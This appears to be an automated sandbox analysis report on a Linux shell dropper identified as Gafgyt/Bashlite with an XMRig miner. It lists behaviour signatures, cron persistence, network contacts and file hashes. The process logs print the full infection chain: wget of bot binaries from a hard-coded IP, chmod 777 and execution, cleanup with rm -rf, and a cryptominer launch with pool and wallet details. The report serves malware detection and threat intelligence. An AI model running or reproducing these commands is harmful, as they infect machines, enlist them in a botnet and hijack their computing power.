Analysis Overview
SHA256
5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
Threat Level: Known bad
The file tyo2831qq.sh was found to be: Known bad.
Malicious Activity Summary
xmrig
Xmrig_linux family
XMRig Miner payload
Xmrig family
Detected Gafgyt variant
Gafgyt family
Gafgyt/Bashlite
Executes dropped EXE
File and Directory Permissions Modification
Creates/modifies Cron job
Legitimate hosting services abused for malware hosting/C2
Reads system routing table
Writes file to system bin folder
Reads system network configuration
Reads runtime system information
Writes file to tmp directory
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 04:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 04:09
Reported
2024-11-09 04:11
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
95s
Max time network
128s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt family
Gafgyt/Bashlite
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/bots | /tmp/bots | N/A |
| N/A | /tmp/fileibWhol | /tmp/fileibWhol | N/A |
| N/A | /tmp/filebGBbym | /tmp/filebGBbym | N/A |
| N/A | /tmp/filedQZH4W | /tmp/filedQZH4W | N/A |
| N/A | /tmp/fileIZmINp | /tmp/fileIZmINp | N/A |
| N/A | /tmp/fileyOeFL0 | /tmp/fileyOeFL0 | N/A |
| N/A | /tmp/filelEGrRt | /tmp/filelEGrRt | N/A |
| N/A | /tmp/fileNiUUx5 | /tmp/fileNiUUx5 | N/A |
| N/A | /tmp/file2WqZIz | /tmp/file2WqZIz | N/A |
| N/A | /tmp/fileD5R9Xa | /tmp/fileD5R9Xa | N/A |
| N/A | /tmp/fileGhyk4A | /tmp/fileGhyk4A | N/A |
| N/A | /tmp/filel8AkDc | /tmp/filel8AkDc | N/A |
| N/A | /tmp/fileCSmOoG | /tmp/fileCSmOoG | N/A |
| N/A | /tmp/fileVJaGhi | /tmp/fileVJaGhi | N/A |
| N/A | /tmp/fileGF37SJ | /tmp/fileGF37SJ | N/A |
| N/A | /tmp/fileoIRPGl | /tmp/fileoIRPGl | N/A |
| N/A | /tmp/fileoAru1O | /tmp/fileoAru1O | N/A |
| N/A | /tmp/fileDaBA4r | /tmp/fileDaBA4r | N/A |
| N/A | /tmp/filedLbafW | /tmp/filedLbafW | N/A |
| N/A | /tmp/file3O8iBx | /tmp/file3O8iBx | N/A |
| N/A | /tmp/fileAOvPk1 | /tmp/fileAOvPk1 | N/A |
| N/A | /tmp/fileCwJsFC | /tmp/fileCwJsFC | N/A |
| N/A | /tmp/fileyEYfs5 | /tmp/fileyEYfs5 | N/A |
| N/A | /tmp/fileueaHmH | /tmp/fileueaHmH | N/A |
| N/A | /tmp/fileH1vC07 | /tmp/fileH1vC07 | N/A |
| N/A | /tmp/filem6VSkI | /tmp/filem6VSkI | N/A |
| N/A | /tmp/fileh2Azrd | /tmp/fileh2Azrd | N/A |
| N/A | /tmp/filexXoNQO | /tmp/filexXoNQO | N/A |
| N/A | /tmp/fileOf8Bu8 | /tmp/fileOf8Bu8 | N/A |
| N/A | /tmp/file4hnC0J | /tmp/file4hnC0J | N/A |
| N/A | /tmp/fileI7IdvX | /tmp/fileI7IdvX | N/A |
| N/A | /tmp/fileQoM44m | /tmp/fileQoM44m | N/A |
| N/A | /tmp/fileLoiThM | /tmp/fileLoiThM | N/A |
| N/A | /tmp/fileUnYIGZ | /tmp/fileUnYIGZ | N/A |
| N/A | /tmp/filevfTFbq | /tmp/filevfTFbq | N/A |
| N/A | /tmp/file3rmi0O | /tmp/file3rmi0O | N/A |
| N/A | /tmp/filedOlYi6 | /tmp/filedOlYi6 | N/A |
| N/A | /tmp/fileFw29Lt | /tmp/fileFw29Lt | N/A |
| N/A | /tmp/fileyKTYD6 | /tmp/fileyKTYD6 | N/A |
| N/A | /tmp/filenm6bft | /tmp/filenm6bft | N/A |
| N/A | /tmp/fileJtGkIU | /tmp/fileJtGkIU | N/A |
| N/A | /tmp/fileouKtFj | /tmp/fileouKtFj | N/A |
| N/A | /tmp/filewTNYwB | /tmp/filewTNYwB | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileD5R9Xa | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileVJaGhi | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileoIRPGl | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file3rmi0O | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filedOlYi6 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/tyo2831qq.x86 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filedQZH4W | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileNiUUx5 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileCSmOoG | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileAOvPk1 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileUnYIGZ | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileibWhol | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileCwJsFC | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filem6VSkI | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileI7IdvX | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileLoiThM | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filevfTFbq | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filenm6bft | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filebGBbym | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filedLbafW | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileueaHmH | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileyKTYD6 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileyOeFL0 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file2WqZIz | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filel8AkDc | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileGF37SJ | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileDaBA4r | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileh2Azrd | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file4hnC0J | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileJtGkIU | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filelEGrRt | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileoAru1O | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file3O8iBx | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileQoM44m | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileouKtFj | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileIZmINp | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileGhyk4A | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileyEYfs5 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileH1vC07 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filexXoNQO | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileFw29Lt | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileOf8Bu8 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.i586 | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/ls | /tmp/tyo2831qq.x86 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.i586 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/file2WqZIz | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileD5R9Xa | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileVJaGhi | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileoAru1O | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileCwJsFC | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileyEYfs5 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileQoM44m | N/A |
| File opened for reading | /proc/self/exe | /tmp/filebGBbym | N/A |
| File opened for reading | /proc/self/exe | /tmp/filelEGrRt | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileueaHmH | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileH1vC07 | N/A |
| File opened for reading | /proc/self/exe | /tmp/file4hnC0J | N/A |
| File opened for reading | /proc/self/exe | /tmp/tyo2831qq.x86 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileibWhol | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileAOvPk1 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filem6VSkI | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileI7IdvX | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileLoiThM | N/A |
| File opened for reading | /proc/self/exe | /tmp/file3rmi0O | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileJtGkIU | N/A |
| File opened for reading | /proc/self/exe | /tmp/filel8AkDc | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileGF37SJ | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileh2Azrd | N/A |
| File opened for reading | /proc/self/exe | /tmp/filexXoNQO | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileFw29Lt | N/A |
| File opened for reading | /proc/self/exe | /tmp/filewTNYwB | N/A |
| File opened for reading | /proc/self/exe | /tmp/filedQZH4W | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileGhyk4A | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileDaBA4r | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileOf8Bu8 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileCSmOoG | N/A |
| File opened for reading | /proc/self/exe | /tmp/file3O8iBx | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileUnYIGZ | N/A |
| File opened for reading | /proc/self/exe | /tmp/filedOlYi6 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileyKTYD6 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileIZmINp | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileyOeFL0 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileNiUUx5 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filedLbafW | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileouKtFj | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileoIRPGl | N/A |
| File opened for reading | /proc/self/exe | /tmp/filevfTFbq | N/A |
| File opened for reading | /proc/self/exe | /tmp/filenm6bft | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/tyo2831qq.mips | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/file3O8iBx | /tmp/filedLbafW | N/A |
| File opened for modification | /tmp/fileyEYfs5 | /tmp/fileCwJsFC | N/A |
| File opened for modification | /tmp/fileueaHmH | /tmp/fileyEYfs5 | N/A |
| File opened for modification | /tmp/fileOf8Bu8 | /tmp/filexXoNQO | N/A |
| File opened for modification | /tmp/tyo2831qq.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bots | /tmp/tyo2831qq.x86 | N/A |
| File opened for modification | /tmp/fileyOeFL0 | /tmp/fileIZmINp | N/A |
| File opened for modification | /tmp/filedLbafW | /tmp/fileDaBA4r | N/A |
| File opened for modification | /tmp/filem6VSkI | /tmp/fileH1vC07 | N/A |
| File opened for modification | /tmp/fileh2Azrd | /tmp/filem6VSkI | N/A |
| File opened for modification | /tmp/bots | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileibWhol | /tmp/tyo2831qq.x86 | N/A |
| File opened for modification | /tmp/filedQZH4W | /tmp/filebGBbym | N/A |
| File opened for modification | /tmp/fileI7IdvX | /tmp/file4hnC0J | N/A |
| File opened for modification | /tmp/file3rmi0O | /tmp/filevfTFbq | N/A |
| File opened for modification | /tmp/filedOlYi6 | /tmp/file3rmi0O | N/A |
| File opened for modification | /tmp/filewTNYwB | /tmp/fileouKtFj | N/A |
| File opened for modification | /tmp/tyo2831qq.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filelEGrRt | /tmp/fileyOeFL0 | N/A |
| File opened for modification | /tmp/fileVJaGhi | /tmp/fileCSmOoG | N/A |
| File opened for modification | /tmp/fileoAru1O | /tmp/fileoIRPGl | N/A |
| File opened for modification | /tmp/fileDaBA4r | /tmp/fileoAru1O | N/A |
| File opened for modification | /tmp/tyo2831qq.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileIZmINp | /tmp/filedQZH4W | N/A |
| File opened for modification | /tmp/filel8AkDc | /tmp/fileGhyk4A | N/A |
| File opened for modification | /tmp/fileGF37SJ | /tmp/fileVJaGhi | N/A |
| File opened for modification | /tmp/fileAOvPk1 | /tmp/file3O8iBx | N/A |
| File opened for modification | /tmp/fileH1vC07 | /tmp/fileueaHmH | N/A |
| File opened for modification | /tmp/file4hnC0J | /tmp/fileOf8Bu8 | N/A |
| File opened for modification | /tmp/filekKP7GW | /tmp/fileFw29Lt | N/A |
| File opened for modification | /tmp/fileJtGkIU | /tmp/filenm6bft | N/A |
| File opened for modification | /tmp/fileX9kSc0 | /tmp/filewTNYwB | N/A |
| File opened for modification | /tmp/tyo2831qq.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filebGBbym | /tmp/fileibWhol | N/A |
| File opened for modification | /tmp/fileNiUUx5 | /tmp/filelEGrRt | N/A |
| File opened for modification | /tmp/fileCSmOoG | /tmp/filel8AkDc | N/A |
| File opened for modification | /tmp/fileoIRPGl | /tmp/fileGF37SJ | N/A |
| File opened for modification | /tmp/filevfTFbq | /tmp/fileUnYIGZ | N/A |
| File opened for modification | /tmp/file2WqZIz | /tmp/fileNiUUx5 | N/A |
| File opened for modification | /tmp/filexXoNQO | /tmp/fileh2Azrd | N/A |
| File opened for modification | /tmp/fileQoM44m | /tmp/fileI7IdvX | N/A |
| File opened for modification | /tmp/fileLoiThM | /tmp/fileQoM44m | N/A |
| File opened for modification | /tmp/fileUnYIGZ | /tmp/fileLoiThM | N/A |
| File opened for modification | /tmp/fileFw29Lt | /tmp/filedOlYi6 | N/A |
| File opened for modification | /tmp/tyo2831qq.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileD5R9Xa | /tmp/file2WqZIz | N/A |
| File opened for modification | /tmp/fileGhyk4A | /tmp/fileD5R9Xa | N/A |
| File opened for modification | /tmp/fileCwJsFC | /tmp/fileAOvPk1 | N/A |
| File opened for modification | /tmp/filenm6bft | /tmp/fileyKTYD6 | N/A |
| File opened for modification | /tmp/fileouKtFj | /tmp/fileJtGkIU | N/A |
| File opened for modification | /tmp/tyo2831qq.arm6 | /usr/bin/wget | N/A |
Processes
/tmp/tyo2831qq.sh
[/tmp/tyo2831qq.sh]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mips]
/bin/chmod
[chmod 777 tyo2831qq.mips]
/tmp/tyo2831qq.mips
[./tyo2831qq.mips]
/usr/bin/wget
[wget http://31.172.80.237/bots]
/bin/chmod
[chmod 777 bots]
/tmp/bots
[./bots]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mpsl]
/bin/chmod
[chmod 777 tyo2831qq.mpsl]
/tmp/tyo2831qq.mpsl
[./tyo2831qq.mpsl]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.sh4]
/bin/chmod
[chmod 777 tyo2831qq.sh4]
/tmp/tyo2831qq.sh4
[./tyo2831qq.sh4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x86]
/bin/chmod
[chmod 777 tyo2831qq.x86]
/tmp/tyo2831qq.x86
[./tyo2831qq.x86]
/tmp/fileibWhol
[./tyo2831qq.x86]
/tmp/filebGBbym
[./tyo2831qq.x86]
/tmp/filedQZH4W
[./tyo2831qq.x86]
/tmp/fileIZmINp
[./tyo2831qq.x86]
/tmp/fileyOeFL0
[./tyo2831qq.x86]
/tmp/filelEGrRt
[./tyo2831qq.x86]
/tmp/fileNiUUx5
[./tyo2831qq.x86]
/tmp/file2WqZIz
[./tyo2831qq.x86]
/tmp/fileD5R9Xa
[./tyo2831qq.x86]
/tmp/fileGhyk4A
[./tyo2831qq.x86]
/tmp/filel8AkDc
[./tyo2831qq.x86]
/tmp/fileCSmOoG
[./tyo2831qq.x86]
/tmp/fileVJaGhi
[./tyo2831qq.x86]
/tmp/fileGF37SJ
[./tyo2831qq.x86]
/tmp/fileoIRPGl
[./tyo2831qq.x86]
/tmp/fileoAru1O
[./tyo2831qq.x86]
/tmp/fileDaBA4r
[./tyo2831qq.x86]
/tmp/filedLbafW
[./tyo2831qq.x86]
/tmp/file3O8iBx
[./tyo2831qq.x86]
/tmp/fileAOvPk1
[./tyo2831qq.x86]
/tmp/fileCwJsFC
[./tyo2831qq.x86]
/tmp/fileyEYfs5
[./tyo2831qq.x86]
/tmp/fileueaHmH
[./tyo2831qq.x86]
/tmp/fileH1vC07
[./tyo2831qq.x86]
/tmp/filem6VSkI
[./tyo2831qq.x86]
/tmp/fileh2Azrd
[./tyo2831qq.x86]
/tmp/filexXoNQO
[./tyo2831qq.x86]
/tmp/fileOf8Bu8
[./tyo2831qq.x86]
/tmp/file4hnC0J
[./tyo2831qq.x86]
/tmp/fileI7IdvX
[./tyo2831qq.x86]
/tmp/fileQoM44m
[./tyo2831qq.x86]
/tmp/fileLoiThM
[./tyo2831qq.x86]
/tmp/fileUnYIGZ
[./tyo2831qq.x86]
/tmp/filevfTFbq
[./tyo2831qq.x86]
/tmp/file3rmi0O
[./tyo2831qq.x86]
/tmp/filedOlYi6
[./tyo2831qq.x86]
/tmp/fileFw29Lt
[./tyo2831qq.x86]
/tmp/fileyKTYD6
[./tyo2831qq.x86]
/tmp/filenm6bft
[./tyo2831qq.x86]
/tmp/fileJtGkIU
[./tyo2831qq.x86]
/tmp/fileouKtFj
[./tyo2831qq.x86]
/tmp/filewTNYwB
[./tyo2831qq.x86]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm6]
/bin/chmod
[chmod 777 tyo2831qq.arm6]
/tmp/tyo2831qq.arm6
[./tyo2831qq.arm6]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x32]
/bin/chmod
[chmod 777 tyo2831qq.i586]
/tmp/tyo2831qq.i586
[./tyo2831qq.i586]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.m68k]
/bin/chmod
[chmod 777 tyo2831qq.m68k]
/tmp/tyo2831qq.m68k
[./tyo2831qq.m68k]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.spc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm7]
/bin/chmod
[chmod 777 tyo2831qq.arm7]
/tmp/tyo2831qq.arm7
[./tyo2831qq.arm7]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm5]
/bin/rm
[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]
/usr/bin/wget
[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]
/bin/chmod
[chmod 777 xmrig]
/tmp/xmrig
[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| GB | 89.187.167.3:443 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
| US | 1.1.1.1:53 | github.com | udp |
Files
/tmp/bots
| MD5 | 2615e32f9e7b42b36ba1f3dd6f8f7e3c |
| SHA1 | 4286d999a1a76da1e68cb227e01de237ef5fcf68 |
| SHA256 | e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078 |
| SHA512 | b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78 |
/tmp/fileibWhol
| MD5 | a8a6992775589faecef1bc8cf38bdfc5 |
| SHA1 | b6903301aecf34539654f309b8c12773461920dc |
| SHA256 | cae053bfac71081a19bd64ae66f3fc9a149bcbe492eeb46d33647e01ab18eb52 |
| SHA512 | dd803894a1bb9caa2bb4d1da70d35a531a7f76718d23392ff7ee511f489f413f2c79e82a3d7432685a36f470b69c74d211d18d050bee1a5d261c75131ee58fb8 |
/etc/cron.hourly/0
| MD5 | 3f006f7f81fc17be7f4a0d3da0fad5de |
| SHA1 | 97a94d3d0654c6551057af3809b52572bd7f9f5d |
| SHA256 | 982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf |
| SHA512 | 97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0 |
/tmp/fileibWhol
| MD5 | 4ac062e7bafef554949de20763c54f7b |
| SHA1 | 24355a299d9aca3953a9fac256cdaf7be0249fda |
| SHA256 | 33368eb166229b262cb964cfa6412478278b2a23e5f0c3de24a56c28dac5eeb0 |
| SHA512 | b12f82c346dbe62b6a96e7c9d3185eb2fdca9cc29ba83e29a102fd746c93d72d919d8146840ab9338dc8a25a7fb2b400a0cd9d0ac2ea5a0471d283f81d115bb9 |
/tmp/bots
| MD5 | b0f19b181c8d6961d1fed5bda4def843 |
| SHA1 | 6e00805b0e6204b1d0c249550567a385e2835226 |
| SHA256 | f4893c325586305fa20901ae1fa6059cc0fac29c57e915a2c6f79c99bb9b9bf7 |
| SHA512 | 997cec78ea201ea7aafc17178dad49193832807971e2f56cbed487a17f1fb287f585f1022613e32ac70c0eac89ca9c253e4e860a2aa23589dc733fe8f8c94e9a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 04:09
Reported
2024-11-09 04:11
Platform
debian9-armhf-20240418-en
Max time kernel
95s
Max time network
96s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/bots | /tmp/bots | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.arm7 | N/A |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.ppc | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.arm7 | N/A |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.arm6 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/tyo2831qq.mips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tyo2831qq.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bots | /usr/bin/wget | N/A |
Processes
/tmp/tyo2831qq.sh
[/tmp/tyo2831qq.sh]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mips]
/bin/chmod
[chmod 777 tyo2831qq.mips]
/tmp/tyo2831qq.mips
[./tyo2831qq.mips]
/usr/bin/wget
[wget http://31.172.80.237/bots]
/bin/chmod
[chmod 777 bots]
/tmp/bots
[./bots]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mpsl]
/bin/chmod
[chmod 777 tyo2831qq.mpsl]
/tmp/tyo2831qq.mpsl
[./tyo2831qq.mpsl]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.sh4]
/bin/chmod
[chmod 777 tyo2831qq.sh4]
/tmp/tyo2831qq.sh4
[./tyo2831qq.sh4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x86]
/bin/chmod
[chmod 777 tyo2831qq.x86]
/tmp/tyo2831qq.x86
[./tyo2831qq.x86]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm6]
/bin/chmod
[chmod 777 tyo2831qq.arm6]
/tmp/tyo2831qq.arm6
[./tyo2831qq.arm6]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x32]
/bin/chmod
[chmod 777 tyo2831qq.x32]
/tmp/tyo2831qq.x32
[./tyo2831qq.x32]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.ppc]
/bin/chmod
[chmod 777 tyo2831qq.ppc]
/tmp/tyo2831qq.ppc
[./tyo2831qq.ppc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.i586]
/bin/chmod
[chmod 777 tyo2831qq.i586]
/tmp/tyo2831qq.i586
[./tyo2831qq.i586]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.m68k]
/bin/chmod
[chmod 777 tyo2831qq.m68k]
/tmp/tyo2831qq.m68k
[./tyo2831qq.m68k]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.spc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm7]
/bin/chmod
[chmod 777 tyo2831qq.arm7]
/tmp/tyo2831qq.arm7
[./tyo2831qq.arm7]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm5]
/bin/rm
[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]
/usr/bin/wget
[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]
/bin/chmod
[chmod 777 xmrig]
/tmp/xmrig
